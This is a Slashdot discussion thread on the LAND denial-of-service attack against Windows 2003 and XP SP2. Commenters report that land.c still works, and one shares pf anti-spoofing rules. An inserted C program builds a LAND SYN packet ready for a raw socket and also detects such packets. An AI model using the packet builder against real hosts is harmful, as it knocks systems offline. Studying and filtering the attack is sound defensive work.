

Windows 2003 and XP SP2 Vulnerable To LAND Attack

An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, Windows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this to work, but there's a whole lotta machines that don't have it turned on.


  1. Only win ? by mirko · · Score: 4, Interesting

    Are only Windows platforms vulnerable or will these attacks be successful on other non-MS platforms?

    --
    Trolling using another account since 2005.
    1. Re:Only win ? by ip_fired · · Score: 3, Interesting

      I compiled land.c on linux and then had it test my powerbook (OS X.3.8) on an open port. Nothing happened, thus it's not exploitable.

      If anyone is interested, I had to modify the program to get it to work in linux (the structures have changed since this was originally written).

      Here is a patch so you can test other OSes.

      land.diff

      Curse you slashcode! It won't let me inline the patch. Oh well. Download it if you want it.

      --
      Don't count your messages before they ACK.
  2. What kind of software dev process do MS use? by Ex+Machina · · Score: 5, Interesting

    Isn't this EXACTLY what regression tests were designed for?

    1. Re:What kind of software dev process do MS use? by KDN · · Score: 5, Interesting
      Several jobs ago, I did software development. The manager didn't like how every time I found a significant bug I added it to a test library that I kept and ran against every version of the code that I was about to put out to the group. His thought was "the odds of someone making the same mistake twice are non existent". One time he told me to put the code out before it was done with the regression tests. Sure enough, crash and burn. And yes, my regression tests later caught the bug. Never again.

      As a further indication that I was right, I put an interface around the public interface of my libraries to validate all the parameters and actions. I noticed some people would make the same error so much that I even personalized some of the error messages. Like: "You're passing a string instead of an address John", and "You're reading from a closed object Kevin".

    2. Re:What kind of software dev process do MS use? by Technician · · Score: 2, Interesting

      things that used to work in the old version still works in the new version

      Slightly offtopic but in reply to the parent post..

      My wife bought a new machine with XP home. I decided to move some files. I turned on sharing. I wanted some protection. I tried to set a password on the shared folder.... Um where do you set a password on a folder for read and write privileges? It is missing. You can't share a folder and deny write privileges! This is major not good. My old version of Windows 95 does better on that one. XP home does not pass the Regression test. It's been crippled in several security areas. Ouch! MS missed on that one.

      I'd say that windows is passing its regression tests with flying colors ;)

      Security is job 1 Yea, Right!

      --
      The truth shall set you free!
  3. On a more serious note.. by tabkey12 · · Score: 5, Interesting
    Blanket Attacks (like blaster, where every windows computer on the net with windows sharing on is hit about 6 times an hour) are usually only viable when the Default configuration is insecure.

    At least with SP2 there is some basic security in terms of the firewall being on by default.

    Still, never thought I'd see a slashdot article linking to a page about Trumpet Winsock in 2005!

  4. Can anyone confirm? by Anonymous Coward · · Score: 5, Interesting

    A friend showed this to me a few days ago and I was unable to reproduce the attack over the LAN, both with my own code and some code of the original LAND found with google. Both were run from linux by opening a raw socket, filling in ip and tcp headers including checksums using the structs in ip.h and tcp.h, and sending with sendto(). In both cases ethereal would show the packet as received but the machine would operate normally.

  5. Am I vulnerable? by SteelV · · Score: 3, Interesting

    I have yet to install SP2 because I heard it hurts performance of some computer games, which is mainly what I use my windows PC for.

    I am otherwise up-to-date with windows updates. I have a linksys router for my internet connection, but no software firewall.

    Am I vulnerable to this and other issues? Should I update to SP2 already (the first time I tried it crashed while installing, didn't even work, but I could prob. get it to work next time). Or should I stay with SP1 for games?

    Thank you.

  6. Re:Only one thing though... by yasth · · Score: 2, Interesting

    Yes but it does break a few things. And most users have certainly not downloaded zonealarm. Also W2k iirc does not have a built in firewall.

    Now granted it is only a DoS attack, but still.

    --
    I'd do something interesting, but my server can't handle a slashdotting.
  7. Big deal... by 14erCleaner · · Score: 2, Interesting
    Denial of service attacks are so twentieth-century.

    We've moved on to more productive uses of vulnerable machines (e.g. spam zombies). Who wants to do a DoS attack on a machine without a firewall anyway? What's the point?

    --
    Have you read my blog lately?
  8. Re:Not that big of a deal by Dimensio · · Score: 4, Interesting

    I work in a university. Policy is not to have the Windows firewall turned on because it supposedly conflicts with a few needed applications. There is no hardware firewall whatsoever between the internal network and the outside world.

    Oh, and standard policy is to have user accounts set up as Administrator at all times.

    Cleaning up infected machines is a never-ending endeavour. Oddly, the few departments run by competent admins (as in, not the university's IT department) where user accounts are set up only as Users (among other things) don't have any security problems at all. I wonder why..

    Oh, and before anyone blames me: I'm a grunt with no authority whatsoever. I've voiced my objections to the way things are run, but I can do little more than that.

  9. Re:Not that big of a deal by Mikito · · Score: 2, Interesting

    I would think that there would still be a lot of people (home users) who are running Windows 95, 98, 2000 or XP unpatched. Not everybody can afford to buy new systems every couple of years, and not everybody would even think of upgrading their operating system, let alone patching it or activating a firewall.

    --
    Anakin Simpson: If you're not with me, then you're my enemy--ooh, donuts!
  10. Re:Little known fact by jd · · Score: 4, Interesting
    This is probably going to crack you up. Yes, they do. For secure communications, application serving, and (for the "intelligent" ships) navigation systems.


    There are people in the US Navy who are actively interested in Linux, but they are heavily outnumbered by fans of Windows and SCO Unix.

    --
    It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
  11. Damnit! by GoNINzo · · Score: 3, Interesting

    I pointed this out YEARS ago. I just don't understand why the updated winsock didn't get used in 2k when they overhauled the tcp stack. (and wow is that an old email addy. heh)

    --
    Gonzo Granzeau
    "Nothing the god of biomechanics wouldn't let you into heaven for.." -Roy Batty
  12. Re:News? by PyWiz · · Score: 3, Interesting

    Well, sure, as many people have pointed out, by disabling your firewall you are leaving yourself open to attacks. In addition, the LAND attack is merely a DoS attack and thus does not pose much threat to home computers (and servers would have firewalls).

    However, that is far from the point. The point is that 8 years after an attack was discovered, Microsoft's commercial OS was STILL vulnerable to it. Obviously, if they're leaving themselves open to such vintage attacks as LAND, their security testing processes can't be all that great can they? What's there to assure us another more dangerous attack won't be discovered in the near future?

    At least in my opinion, this is yet another argument for open source. The MS developers that worked on this part of the code probably just threw some old stuff together and called it a day. The module was probably reviewed by few other people and thus such an obvious vulnerability was released in the final product. With an open source product like Linux, this kind of stuff rarely if ever happens. So many people are scrutinizing the code that the chances of an obvious vuln going unnoticed are next to nothing.

    I guess what I'm saying is, before you leave your critical data to a company propagating closed source products like MS, you should at least make sure they have their proverbial shit together first.

    -py

    --
    -py
  13. Re:Only one thing though... by the_rev_matt · · Score: 2, Interesting

    You haven't met many users outside the IT field apparently. I know plenty of family and friends who've turned off the firewall to play some game and outside the IT field only a single one of my friends or family has heard of ZoneAlarm or anything like it.

    --
    this is getting old and so are you

    blog

  14. Re:Only one thing though... by PaperMCSE · · Score: 2, Interesting

    When you get a Dell and turn it on for the first time, you go through a little setup procedure. This is when you *are asked* if you want to turn the firewall on. Turning it on is labeled as "recommended".

    I would imagine this is the same for any OEM Windows provider.

  15. It works. Whoo. by Anonymous Coward · · Score: 1, Interesting

    Had to hack the old land.c to compile on my FC 3 machine, but it works nicely.

    Every packet causes about 10 seconds of heavy CPU usage on Windows Server 2003. Ditto for Windows XP SP2.

    Processes like a CS server running on the XP box were completely unresponsive. Let the DoSing begin.

  16. Re:wow by Maestro4k · · Score: 4, Interesting
    but the reality is this vulnerability happened after SP2 was released.
    • Actually no, this vulnerability showed up 8 years ago and was patched in Windows 98 I believe. So this isn't something new that Microsoft is just now learning about and needs to fix, it's something quite old. Since the vulnerability came out ME, 2000 and XP all were released.
    Perhaps they set up a firewall to allow them to fix things underneath without totally destroying everyone's networks?
    • If you're trying to say that MS feels that having the firewall on by default in XP SP2 is a shortcut for fixing problems, well, I certainly HOPE they're not taking that attitude. Yes the firewall needs to be on by default for better security, but they should have tested the OS against known vulnerabilities with the firewall off to be certain they wouldn't work. Failure to do so shows some serious problems in MS land.
    When you have as large of an installbase as MS does you can't shift things right away or you will lose customers, you have to make changes slowly and incrementally so that users don't get confused.
    • You seem royally confused about what this actually is. Land is a DoS attack that is caused by sending a SYN packet to an open port on a machine with the source and destination addresses the same. This isn't something that is _needed_ by any app, it's a TCP/IP oddity, a packet that would normally never occur. Back 8 years ago it was understandable that MS and others didn't anticipate this attack, but after 8 years there's not any excuse.
    • Simply, this is not something users are going to notice the lack of. They'll certainly notice it's there if their machines get hit with a Land attack though. It is NOT a case of MS trying to make changes slowly to not confuse customers, it's a big blunder.

    MS has been working a lot on connectivity over the last year or so with some protocol enhancements and increased IPv6 support. I imagine things are going to get worse before they get better, but don't kid yourself, they are working on fixing it.
    • Frankly if their "working on fixing it" involves re-introducing exploits first identified and fixed 8 YEARS ago then I'm certainly not going to hold my breath that they'll ever fix anything.
    • Ultimately though your defense of MS is unwarranted. They publicly declared a while back (1-2 years now I think) that security was going to be a primary focus for them. This was pre-SP2 days. That they re-introduced a vulnerability from eight years ago speaks great volumes about that focus. If MS wants to claim they're security-focused now they deserve the lumps they get for foolish mistakes like this.

  17. Re:Not that big of a deal by pliny3 · · Score: 2, Interesting
    Anybody with a web server must accept incoming syn packets. If they are "protected" by something like: ...

    Using OpenBSD pf(4):

    # Non-routeable addresses (RFC 1918 private ranges, loopback, limited
    # broadcast). Used to detect packets with forged origins.
    NoRoute = "{ 127.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12, 10.0.0.0/8, 255.255.255.255/32 }"

    # don't allow anyone to spoof non-routeable addresses
    block in log quick on $public_interface from $NoRoute to any
    block out log quick on $public_interface from any to $NoRoute

    # A LAND packet arrives from outside carrying the server's own public
    # address as its source; antispoof expands to rules that drop packets
    # claiming to come from the interface's own address or network.
    antispoof log quick for $public_interface
    An IIS server behind this isn't seeing those packets.
  18. Requires local network access in most cases? by LodCrappo · · Score: 2, Interesting

    Since this attack sends a packet with a source address of the target host rather than the attacker, won't this attack fail in a vast majority of remote situations (i.e. via Internet or not on the same LAN as the target)?? Doesn't almost every ISP filter outgoing packets for a bit of sanity, especially valid (or reasonable) source addresses? I know my ISPs at home (Adelphia cable) and work (AT&T data) do.

    --
    -Lod
  19. Solaris 2.5.1? Yes, it's still about. by hot_Karls_bad_cavern · · Score: 4, Interesting

    Believe it or not, some folks still use Solaris 2.5 and 2.6 versions. I used to work at a university whose physics department was fortunate enough to have two electron scanning microscopes, one old and huge and one new, smaller one. The old one had controlling software that was custom, to say the least, and written by a German firm that's been out of business for a few years now.

    Guess what OS the software ran on? And what hardware connections were custom to the old Sparc-based controller that ran the thing? Wohoo! Old Solaris was the only way it'd still 'go'.

    Well, sneaker-net wasn't going to work for the grads that were abroad and well, the profs wanted network access, so they were going to get it. Short of the long, we had to build, tweak and mess with all kinds of junk (tcpwrappers, ssh, ssl) before it went back on the network (yes, that donkey had been hacked before). So yes, there's lots of old Solaris still out there.

    And before anyone asks, yes I finally quit that job due to *not* being able to secure things like this. Authenticating gateways, openvpn, pf on Solaris (boss would *never* let me put that on all the machines we cared for ... unbelievable really), moving *away* from Sendmail, installing Solaris machines with everything locked down, etc, etc). Drove me fucking mad.

  20. Re:wow by jschottm · · Score: 2, Interesting

    You might forget that MS is not a security company.

    Every company that does computer work has to be a security company now. Many companies are completely dependent on computers and most of their crown jewels are stored on them. Many home users have sensitive banking information stored on their computers. Building broken software that allows system disruption or data to be stolen will lose customers. Part of my job is to migrate systems from Windows to Linux, specifically because of security and stability issues.

    When you have as large of an installbase as MS does you can't shift things right away or you will lose customers, you have to make changes slowly and incrementally so that users don't get confused.

    That has no bearing whatsoever on this issue. Inserting

    if (fromIP == toIP && fromPort == toPort && TCPFlag == 'S') droppacket(); //Or whatever

    does not break any functionality because it's a packet that should not exist. It's something they fixed in older versions but got lazy and left out of current versions.
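The two posts above describe the whole attack between them: comment 4 builds the packet by hand (IP and TCP headers, checksums included, handed to sendto() on a raw socket), and comment 20 sketches the one-line check that makes it harmless. The following is an added example written for this thread, not the original land.c and not Microsoft's or anyone else's stack code: it serialises a TCP/IPv4 segment the way land.c does (source address and port equal to destination address and port, SYN flag set) and implements the check from comment 20 as a real classifier that also validates both checksums so a mangled packet is reported as such rather than silently passed. The 10.0.0.5 address, the ports and the sequence number are constructed sample values.

```c
/* LAND packet builder and classifier. Added example for this thread, not
 * the original land.c. Sample addresses/ports below are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IP_HDR_LEN      20
#define TCP_HDR_LEN     20
#define SEG_LEN         (IP_HDR_LEN + TCP_HDR_LEN)
#define IPPROTO_TCP_NUM 6
#define TCP_SYN         0x02
#define TCP_ACK         0x10

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t get32(const uint8_t *p) { return ((uint32_t)get16(p) << 16) | get16(p + 2); }

/* RFC 1071 one's-complement sum; callers chain csum_add and fold once. */
static uint32_t csum_add(uint32_t sum, const uint8_t *d, size_t len) {
    size_t i;
    for (i = 0; i + 1 < len; i += 2) sum += (uint32_t)((d[i] << 8) | d[i + 1]);
    if (len & 1) sum += (uint32_t)(d[len - 1] << 8);
    return sum;
}
static uint16_t csum_fold(uint32_t sum) {
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Sum of the TCP pseudo-header: src, dst, zero, protocol, TCP length. */
static uint32_t tcp_pseudo_sum(uint32_t saddr, uint32_t daddr, uint16_t tcp_len) {
    uint8_t ph[12];
    put32(ph, saddr); put32(ph + 4, daddr);
    ph[8] = 0; ph[9] = IPPROTO_TCP_NUM; put16(ph + 10, tcp_len);
    return csum_add(0, ph, sizeof ph);
}

/* Serialise an IPv4 header plus a 20-byte TCP header into out (SEG_LEN bytes).
 * saddr == daddr, sport == dport and flags == TCP_SYN is what land.c sends;
 * the result is the buffer one would pass to sendto() on a raw socket with
 * IP_HDRINCL set. Returns the number of bytes written. */
size_t build_tcp_segment(uint8_t *out, uint32_t saddr, uint16_t sport,
                         uint32_t daddr, uint16_t dport, uint8_t flags) {
    uint8_t *ip = out, *tcp = out + IP_HDR_LEN;
    memset(out, 0, SEG_LEN);
    ip[0] = 0x45;                       /* version 4, IHL 5 words */
    put16(ip + 2, SEG_LEN);             /* total length */
    put16(ip + 4, 0x1234);              /* identification (arbitrary) */
    ip[8] = 64;                         /* TTL */
    ip[9] = IPPROTO_TCP_NUM;
    put32(ip + 12, saddr);
    put32(ip + 16, daddr);
    put16(ip + 10, csum_fold(csum_add(0, ip, IP_HDR_LEN)));

    put16(tcp, sport);
    put16(tcp + 2, dport);
    put32(tcp + 4, 0x11223344u);        /* initial sequence number (arbitrary) */
    tcp[12] = (TCP_HDR_LEN / 4) << 4;   /* data offset, no options */
    tcp[13] = flags;
    put16(tcp + 14, 8192);              /* window */
    put16(tcp + 16, csum_fold(csum_add(tcp_pseudo_sum(saddr, daddr, TCP_HDR_LEN),
                                       tcp, TCP_HDR_LEN)));
    return SEG_LEN;
}

/* Classify a raw IPv4 packet: 1 = LAND (TCP SYN without ACK whose source
 * address/port equal its destination address/port), 0 = anything else that
 * parses cleanly, -1 = truncated, malformed or failing a checksum. */
int is_land_packet(const uint8_t *pkt, size_t len) {
    size_t ihl, tot, tcp_len;
    const uint8_t *tcp;
    if (len < IP_HDR_LEN || (pkt[0] >> 4) != 4) return -1;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    tot = get16(pkt + 2);
    if (ihl < IP_HDR_LEN || tot > len || tot < ihl + TCP_HDR_LEN) return -1;
    if (csum_fold(csum_add(0, pkt, ihl)) != 0) return -1;     /* IP header checksum */
    if (pkt[9] != IPPROTO_TCP_NUM) return 0;
    tcp = pkt + ihl;
    tcp_len = tot - ihl;
    if (csum_fold(csum_add(tcp_pseudo_sum(get32(pkt + 12), get32(pkt + 16), (uint16_t)tcp_len),
                           tcp, tcp_len)) != 0) return -1;    /* TCP checksum */
    if (!(tcp[13] & TCP_SYN) || (tcp[13] & TCP_ACK)) return 0;
    return get32(pkt + 12) == get32(pkt + 16) && get16(tcp) == get16(tcp + 2);
}

/* Build a segment, optionally corrupt its IP checksum, and classify it. */
int classify_built(uint32_t saddr, uint16_t sport, uint32_t daddr, uint16_t dport,
                   uint8_t flags, int corrupt_ip_csum) {
    uint8_t buf[SEG_LEN];
    size_t n = build_tcp_segment(buf, saddr, sport, daddr, dport, flags);
    if (corrupt_ip_csum) buf[10] ^= 0xff;
    return is_land_packet(buf, n);
}

int main(void) {
    uint32_t host = 0x0a000005u;        /* 10.0.0.5, constructed sample target */
    printf("LAND SYN to self:  %d\n", classify_built(host, 80, host, 80, TCP_SYN, 0));
    printf("ordinary SYN:      %d\n", classify_built(0x0a000007u, 40000, host, 80, TCP_SYN, 0));
    printf("SYN/ACK to self:   %d\n", classify_built(host, 80, host, 80, TCP_SYN | TCP_ACK, 0));
    printf("bad IP checksum:   %d\n", classify_built(host, 80, host, 80, TCP_SYN, 1));
    return 0;
}
```

The classifier is deliberately stricter than the one-liner: it refuses to decide on a packet whose IP or TCP checksum does not verify, because a filter that drops on a partially parsed header can itself be fed garbage, and it requires SYN without ACK so that a legitimate loopback-style SYN/ACK is not mistaken for the attack. The address equality check alone is what comment 16 describes; the port check is what land.c actually sends.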

  21. Re:Only one thing though... by peg0cjs · · Score: 2, Interesting
    This is absolutely true!

    I remember when one of my friends (who lives 1000 kms away) was complaining to me about all the MSN Messenger spam she was getting and about how slow her pc was becoming. I had her install VNC & started tinkering remotely to see what I could see. I was amazed.

    1. She had a direct cable connection with no firewall. She didn't even know what a firewall was.
    2. She had IIS running on her box for no reason.
    3. She had SMTP server running for no reason (at least it wasn't an open relay)
    4. She hadn't run Windows Update in over a year.
    5. She had no A/V software running.

    It took about an hour of remote work to set her up in a far more secure way, another few hours to scan & clean all the spyware from her box and she hasn't had a problem since.

    I figured it was my good deed of the month and banked the karma, but it goes to show how little the non-IT world cares about security. All they want is:

    1. for the system to work,
    2. for the system to protect them,
    3. to stay up to date, and
    4. to not have to know anything about it.

    I could have thrown on 5. Profit! for me, but I didn't want to take advantage of a very close friend who has been there for me for the past 20+ yrs.

    --
    Karma: Excellent (Mainly due to Bill & Ted's Karma Adventure)
  22. Linux version of the exploit by duncanthrax · · Score: 3, Interesting

    Yes, it actually works on SP2. Fire up Task Manager and watch CPU load reach 100% for ~10 seconds for a single packet.

    Here's the code that should compile on Linux.

  23. Re:wow by Fulcrum+of+Evil · · Score: 2, Interesting

    Even worse, maybe the leak was caused because people were shoving large objects down there.

    In this case, the large object was a land attack, so fixing the pipe and noting that shoving a large object through the pipe did not break it would be expected. However, windows is not a leaky pipe, and it doesn't suffer from cold weather or any other sort of physical degradation. Put simply, this is a known vulnerability that should have been tested as part of QA. It wasn't.

    --
    "We returned the General to El Salvador, or maybe Guatemala, it's difficult to tell from 10,000 feet"
  24. Re:wow by SillyNickName4me · · Score: 2, Interesting

    That pipe you describe does sound a lot like Windows, that's for sure, but honestly, you don't seem to have a clue what this specific bug is and how utterly simple it is to check for and prevent. That Windows is a terrible nightmare to maintain is really no excuse for this.

  25. Re:News? by Renegrade · · Score: 2, Interesting

    I've always thought of my driving as being the first line of defense, and my seatbelt as being the second line, there in the case that the first fails. Ideally there shouldn't be any accidents (the software shouldn't self destruct when reading malformed data) but it doesn't hurt to wear your seatbelt, just in case (firewall).

    I'm leaving airbags out of this entirely, because studies of them don't seem to show enough improvement to have this explosive device installed in the cabin of the vehicle. Especially since older models (such as the ones I have) can injure adults and kill children.

    Getting really off topic - Has anybody ever thought of putting high performance seatbelts in passenger vehicles? You know, extra padding, double belts/belt webs for better weight distribution, etc, like the type used in racing cars?

  26. Re:Turn off the firewall? by ChaosDiscord · · Score: 2, Interesting
    OK, so what you're saying is that in order for XP to be vulnerable, it must be directly connected to the Internet, the user must specifically have disabled the firewall, and no intermediate firewall must be present.

    Although it's a good idea to have an intermediate firewall to catch obviously bogus packets, that's not an excuse for Microsoft to be sloppy.

    As for disabling the firewall, while that's probably a bad idea for Joe Home User, what if I want to run my web site off of a Windows XP box? Presumably I'm going to have to open up a hole to port 80 so people can connect to it. That open port becomes a target for this attack. Firewalls aren't magic pixie dust that just makes everything bad go away while leaving everything good alone.

    (It's possible the firewall has specific code to block this type of bogus packet even on open ports, but that isn't clear. Even if it does it's bloody stupid.)

    To suggest that it's not serious since everyone should just use a firewall is to suggest that Windows XP is not suitable for running network services. While I'm prone to agree, it's hardly a rousing defense of the operating system.